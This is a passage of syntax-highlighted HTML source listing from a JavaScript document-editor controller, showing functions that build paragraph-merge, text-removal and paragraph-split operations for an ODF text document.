class="PUNC">,</span><span class="WHIT"> <span class='line'>152</span> </span><span class="WHIT"> </span><span class="NAME">lastParagraph</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>153</span> </span><span class="WHIT"> </span><span class="NAME">mergedParagraphStyleName</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>154</span> </span><span class="WHIT"> </span><span class="NAME">previousParagraphStart</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>155</span> </span><span class="WHIT"> </span><span class="NAME">paragraphs</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odfUtils.getParagraphElements</span><span class="PUNC">(</span><span class="NAME">range</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>156</span> </span><span class="WHIT"> </span><span class="NAME">paragraphRange</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="COMM">/**@type{!Range}*/</span><span class="PUNC">(</span><span class="NAME">range.cloneRange</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>157</span> </span><span class="WHIT"> </span><span class="NAME">operations</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="PUNC">[</span><span class="PUNC">]</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>158</span> <span class='line'>159</span> </span><span class="WHIT"> </span><span class="COMM">// If the removal range spans several paragraphs, decide the final paragraph's style name.</span><span class="WHIT"> <span class='line'>160</span> </span><span class="WHIT"> </span><span class="NAME">firstParagraph</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">paragraphs</span><span class="PUNC">[</span><span class="NUMB">0</span><span class="PUNC">]</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>161</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">paragraphs.length</span><span class="WHIT"> </span><span class="PUNC">></span><span class="WHIT"> </span><span class="NUMB">1</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>162</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">odfUtils.hasNoODFContent</span><span class="PUNC">(</span><span class="NAME">firstParagraph</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>163</span> </span><span class="WHIT"> </span><span class="COMM">// If the first paragraph is empty, the last paragraph's style wins, otherwise the first wins.</span><span class="WHIT"> <span class='line'>164</span> </span><span class="WHIT"> </span><span class="NAME">lastParagraph</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">paragraphs</span><span class="PUNC">[</span><span class="NAME">paragraphs.length</span><span class="WHIT"> </span><span class="PUNC">-</span><span class="WHIT"> </span><span class="NUMB">1</span><span class="PUNC">]</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>165</span> </span><span class="WHIT"> </span><span class="NAME">mergedParagraphStyleName</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">lastParagraph.getAttributeNS</span><span class="PUNC">(</span><span class="NAME">odf.Namespaces.textns</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="STRN">'style-name'</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">||</span><span class="WHIT"> </span><span class="STRN">""</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>166</span> <span class='line'>167</span> </span><span class="WHIT"> </span><span class="COMM">// Side note:</span><span class="WHIT"> <span class='line'>168</span> </span><span class="WHIT"> </span><span class="COMM">// According to https://developer.mozilla.org/en-US/docs/Web/API/element.getAttributeNS, if there is no</span><span class="WHIT"> <span class='line'>169</span> </span><span class="WHIT"> </span><span class="COMM">// explicitly defined style, getAttributeNS might return either "" or null or undefined depending on the</span><span class="WHIT"> <span class='line'>170</span> </span><span class="WHIT"> </span><span class="COMM">// implementation. Simplify the operation by combining all these cases to be ""</span><span class="WHIT"> <span class='line'>171</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> </span><span class="KEYW">else</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>172</span> </span><span class="WHIT"> </span><span class="NAME">mergedParagraphStyleName</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">firstParagraph.getAttributeNS</span><span class="PUNC">(</span><span class="NAME">odf.Namespaces.textns</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="STRN">'style-name'</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">||</span><span class="WHIT"> </span><span class="STRN">""</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>173</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>174</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>175</span> <span class='line'>176</span> </span><span class="WHIT"> </span><span class="COMM">// Note, the operations are built up in reverse order to the paragraph DOM order. This prevents the need for</span><span class="WHIT"> <span class='line'>177</span> </span><span class="WHIT"> </span><span class="COMM">// any translation of paragraph start limits as the last paragraph will be removed and merged first</span><span class="WHIT"> <span class='line'>178</span> </span><span class="WHIT"> </span><span class="NAME">paragraphs.forEach</span><span class="PUNC">(</span><span class="KEYW">function</span><span class="PUNC">(</span><span class="NAME">paragraph</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">index</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>179</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">paragraphStart</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>180</span> </span><span class="WHIT"> </span><span class="NAME">removeLimits</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>181</span> </span><span class="WHIT"> </span><span class="NAME">intersectionRange</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>182</span> </span><span class="WHIT"> </span><span class="NAME">removeOp</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>183</span> </span><span class="WHIT"> </span><span class="NAME">mergeOp</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>184</span> <span class='line'>185</span> </span><span class="WHIT"> </span><span class="NAME">paragraphRange.setStart</span><span class="PUNC">(</span><span class="NAME">paragraph</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>186</span> </span><span class="WHIT"> </span><span class="NAME">paragraphRange.collapse</span><span class="PUNC">(</span><span class="KEYW">true</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>187</span> </span><span class="WHIT"> </span><span class="NAME">paragraphStart</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">domToCursorRange</span><span class="PUNC">(</span><span class="NAME">paragraphRange</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">paragraph</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="KEYW">false</span><span class="PUNC">)</span><span class="PUNC">.</span><span class="NAME">position</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>188</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">index</span><span class="WHIT"> </span><span class="PUNC">></span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>189</span> </span><span class="WHIT"> </span><span class="NAME">mergeOp</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">new</span><span class="WHIT"> </span><span class="NAME">ops.OpMergeParagraph</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>190</span> </span><span class="WHIT"> </span><span class="NAME">mergeOp.init</span><span class="PUNC">(</span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>191</span> </span><span class="WHIT"> </span><span class="NAME">memberid</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">inputMemberId</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>192</span> </span><span class="WHIT"> </span><span class="NAME">paragraphStyleName</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">mergedParagraphStyleName</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>193</span> </span><span class="WHIT"> </span><span class="NAME">destinationStartPosition</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">previousParagraphStart</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>194</span> </span><span class="WHIT"> </span><span class="NAME">sourceStartPosition</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">paragraphStart</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>195</span> </span><span class="WHIT"> </span><span class="COMM">// For perf reasons, only the very last merge paragraph op should move the cursor</span><span class="WHIT"> <span class='line'>196</span> </span><span class="WHIT"> </span><span class="NAME">moveCursor</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">index</span><span class="WHIT"> </span><span class="PUNC">===</span><span class="WHIT"> </span><span class="NUMB">1</span><span class="WHIT"> <span class='line'>197</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>198</span> </span><span class="WHIT"> </span><span class="NAME">operations.unshift</span><span class="PUNC">(</span><span class="NAME">mergeOp</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>199</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>200</span> </span><span class="WHIT"> </span><span class="NAME">previousParagraphStart</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">paragraphStart</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>201</span> <span class='line'>202</span> </span><span class="WHIT"> </span><span class="NAME">paragraphRange.selectNodeContents</span><span class="PUNC">(</span><span class="NAME">paragraph</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>203</span> </span><span class="WHIT"> </span><span class="COMM">// The paragraph limits will differ from the text remove limits if either</span><span class="WHIT"> <span class='line'>204</span> </span><span class="WHIT"> </span><span class="COMM">// 1. the remove range starts within an different inline root such as within an annotation</span><span class="WHIT"> <span class='line'>205</span> </span><span class="WHIT"> </span><span class="COMM">// 2. the remove range doesn't cover the entire paragraph (i.e., it starts or ends within the paragraph)</span><span class="WHIT"> <span class='line'>206</span> </span><span class="WHIT"> </span><span class="NAME">intersectionRange</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">domUtils.rangeIntersection</span><span class="PUNC">(</span><span class="NAME">paragraphRange</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">range</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>207</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">intersectionRange</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>208</span> </span><span class="WHIT"> </span><span class="NAME">removeLimits</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">domToCursorRange</span><span class="PUNC">(</span><span class="NAME">intersectionRange</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">paragraph</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>209</span> <span class='line'>210</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">removeLimits.length</span><span class="WHIT"> </span><span class="PUNC">></span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>211</span> </span><span class="WHIT"> </span><span class="NAME">removeOp</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">new</span><span class="WHIT"> </span><span class="NAME">ops.OpRemoveText</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>212</span> </span><span class="WHIT"> </span><span class="NAME">removeOp.init</span><span class="PUNC">(</span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>213</span> </span><span class="WHIT"> </span><span class="NAME">memberid</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">inputMemberId</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>214</span> </span><span class="WHIT"> </span><span class="NAME">position</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">removeLimits.position</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>215</span> </span><span class="WHIT"> </span><span class="NAME">length</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">removeLimits.length</span><span class="WHIT"> <span class='line'>216</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>217</span> </span><span class="WHIT"> </span><span class="NAME">operations.unshift</span><span class="PUNC">(</span><span class="NAME">removeOp</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>218</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>219</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>220</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>221</span> <span class='line'>222</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">operations</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>223</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>224</span> <span class='line'>225</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>226</span> * Ensures the provided selection is a "forward" selection (i.e., length is positive) <span class='line'>227</span> * @param {!{position: number, length: number}} selection <span class='line'>228</span> * @return {!{position: number, length: number}} <span class='line'>229</span> */</span><span class="WHIT"> <span class='line'>230</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">toForwardSelection</span><span class="PUNC">(</span><span class="NAME">selection</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>231</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">selection.length</span><span class="WHIT"> </span><span class="PUNC">&lt;</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>232</span> </span><span class="WHIT"> </span><span class="NAME">selection.position</span><span class="WHIT"> </span><span class="PUNC">+</span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">selection.length</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>233</span> </span><span class="WHIT"> </span><span class="NAME">selection.length</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="PUNC">-</span><span class="NAME">selection.length</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>234</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>235</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">selection</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>236</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>237</span> <span class='line'>238</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>239</span> * Insert a paragraph break at the current cursor location. Will remove any currently selected text first <span class='line'>240</span> * @return {!boolean} <span class='line'>241</span> */</span><span class="WHIT"> <span class='line'>242</span> </span><span class="WHIT"> </span><span class="NAME">this.enqueueParagraphSplittingOps</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">function</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>243</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">!</span><span class="NAME">isEnabled</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>244</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="KEYW">false</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>245</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>246</span> <span class='line'>247</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">cursor</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.getCursor</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>248</span> </span><span class="WHIT"> </span><span class="NAME">range</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">cursor.getSelectedRange</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>249</span> </span><span class="WHIT"> </span><span class="NAME">selection</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">toForwardSelection</span><span class="PUNC">(</span><span class="NAME">odtDocument.getCursorSelection</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>250</span> </span><span class="WHIT"> </span><span class="NAME">op</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>251</span> </span><span class="WHIT"> </span><span class="NAME">operations</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="PUNC">[</span><span class="PUNC">]</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>252</span> </span><span class="WHIT"> </span><span class="NAME">styleOps</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>253</span> </span><span class="WHIT"> </span><span class="NAME">originalParagraph</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="COMM">/**@type{!Element}*/</span><span class="PUNC">(</span><span class="NAME">odtDocument.getParagraphElement</span><span class="PUNC">(</span><span class="NAME">cursor.getNode</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>254</span> </span><span class="WHIT"> </span><span class="NAME">paragraphStyle</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">originalParagraph.getAttributeNS</span><span class="PUNC">(</span><span class="NAME">textns</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="STRN">"style-name"</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">||</span><span class="WHIT"> </span><span class="STRN">""</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>255</span> <span class='line'>256</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">selection.length</span><span class="WHIT"> </span><span class="PUNC">></span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>257</span> </span><span class="WHIT"> </span><span class="NAME">operations</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">operations.concat</span><span class="PUNC">(</span><span class="NAME">createRemoveSelectionOps</span><span class="PUNC">(</span><span class="NAME">range</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>258</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>259</span> <span class='line'>260</span> </span><span class="WHIT"> </span><span class="NAME">op</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">new</span><span class="WHIT"> </span><span class="NAME">ops.OpSplitParagraph</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>261</span> </span><span class="WHIT"> </span><span class="NAME">op.init</span><span class="PUNC">(</span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>262</span> </span><span class="WHIT"> </span><span class="NAME">memberid</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">inputMemberId</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>263</span> </span><span class="WHIT"> </span><span class="NAME">position</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">selection.position</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>264</span> </span><span class="WHIT"> </span><span class="NAME">paragraphStyleName</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">paragraphStyle</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>265</span> </span><span class="WHIT"> </span><span class="NAME">sourceParagraphPosition</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">odtDocument.convertDomPointToCursorStep</span><span class="PUNC">(</span><span class="NAME">originalParagraph</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">roundUp</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>266</span> </span><span class="WHIT"> </span><span class="NAME">moveCursor</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="WHIT"> <span class='line'>267</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>268</span> </span><span class="WHIT"> </span><span class="NAME">operations.push</span><span class="PUNC">(</span><span class="NAME">op</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>269</span> <span class='line'>270</span> </span><span class="WHIT"> </span><span class="COMM">// disabled for now, because nowjs seems to revert the order of the ops, which does not work here TODO: grouping of ops</span><span class="WHIT"> <span class='line'>271</span> </span><span class="WHIT"> </span><span class="COMM">/* <span class='line'>272</span> if (isAtEndOfParagraph) { <span class='line'>273</span> paragraphNode = odtDocument.getParagraphElement(odtDocument.getCursor(inputMemberId).getNode()); <span class='line'>274</span> nextStyleName = odtDocument.getFormatting().getParagraphStyleAttribute(styleName, odf.Namespaces.stylens, 'next-style-name'); <span class='line'>275</span> <span class='line'>276</span> if (nextStyleName && nextStyleName !== styleName) { <span class='line'>277</span> op = new ops.OpSetParagraphStyle(); <span class='line'>278</span> op.init({ <span class='line'>279</span> memberid: inputMemberId, <span class='line'>280</span> position: position + 1, // +1 should be at the start of the new paragraph <span class='line'>281</span> styleName: nextStyleName <span class='line'>282</span> }); <span class='line'>283</span> operations.push(op); <span class='line'>284</span> } <span class='line'>285</span> } <span class='line'>286</span> */</span><span class="WHIT"> <span class='line'>287</span> <span class='line'>288</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">paragraphStyleOps</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>289</span> </span><span class="WHIT"> </span><span class="NAME">styleOps</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">paragraphStyleOps</span><span class="PUNC">(</span><span class="NAME">selection.position</span><span class="WHIT"> </span><span class="PUNC">+</span><span class="WHIT"> </span><span class="NUMB">1</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>290</span> </span><span class="WHIT"> </span><span class="NAME">operations</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">operations.concat</span><span class="PUNC">(</span><span class="NAME">styleOps</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>291</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>292</span> </span><span class="WHIT"> </span><span class="NAME">session.enqueue</span><span class="PUNC">(</span><span class="NAME">operations</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>293</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>294</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>295</span> <span class='line'>296</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>297</span> * Checks if there are any walkable positions in the specified direction within <span class='line'>298</span> * the current root, starting at the specified node. <span class='line'>299</span> * The iterator is constrained within the root element for the current cursor position so <span class='line'>300</span> * iteration will stop once the root is entirely walked in the requested direction <span class='line'>301</span> * @param {!Element} cursorNode <span class='line'>302</span> * @return {!core.StepIterator} <span class='line'>303</span> */</span><span class="WHIT"> <span class='line'>304</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">createStepIterator</span><span class="PUNC">(</span><span class="NAME">cursorNode</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>305</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">cursorRoot</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.getRootElement</span><span class="PUNC">(</span><span class="NAME">cursorNode</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>306</span> </span><span class="WHIT"> </span><span class="NAME">filters</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="PUNC">[</span><span class="NAME">odtDocument.getPositionFilter</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">odtDocument.createRootFilter</span><span class="PUNC">(</span><span class="NAME">cursorRoot</span><span class="PUNC">)</span><span class="PUNC">]</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>307</span> <span class='line'>308</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">odtDocument.createStepIterator</span><span class="PUNC">(</span><span class="NAME">cursorNode</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">filters</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">cursorRoot</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>309</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>310</span> <span class='line'>311</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>312</span> * Remove the current selection, or if the cursor is collapsed, remove the next step <span class='line'>313</span> * in the specified direction. <span class='line'>314</span> * <span class='line'>315</span> * @param {!boolean} isForward True indicates delete the next step. False indicates delete the previous step <span class='line'>316</span> * @return {!boolean} <span class='line'>317</span> */</span><span class="WHIT"> <span class='line'>318</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">removeTextInDirection</span><span class="PUNC">(</span><span class="NAME">isForward</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>319</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">!</span><span class="NAME">isEnabled</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>320</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="KEYW">false</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>321</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>322</span> <span class='line'>323</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">cursorNode</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>324</span> </span><span class="WHIT"> </span><span class="COMM">// Take a clone of the range as it will be modified if the selection length is 0</span><span class="WHIT"> <span class='line'>325</span> </span><span class="WHIT"> </span><span class="NAME">range</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="COMM">/**@type{!Range}*/</span><span class="PUNC">(</span><span class="NAME">odtDocument.getCursor</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">.</span><span class="NAME">getSelectedRange</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">.</span><span class="NAME">cloneRange</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>326</span> </span><span class="WHIT"> </span><span class="NAME">selection</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">toForwardSelection</span><span class="PUNC">(</span><span class="NAME">odtDocument.getCursorSelection</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>327</span> </span><span class="WHIT"> 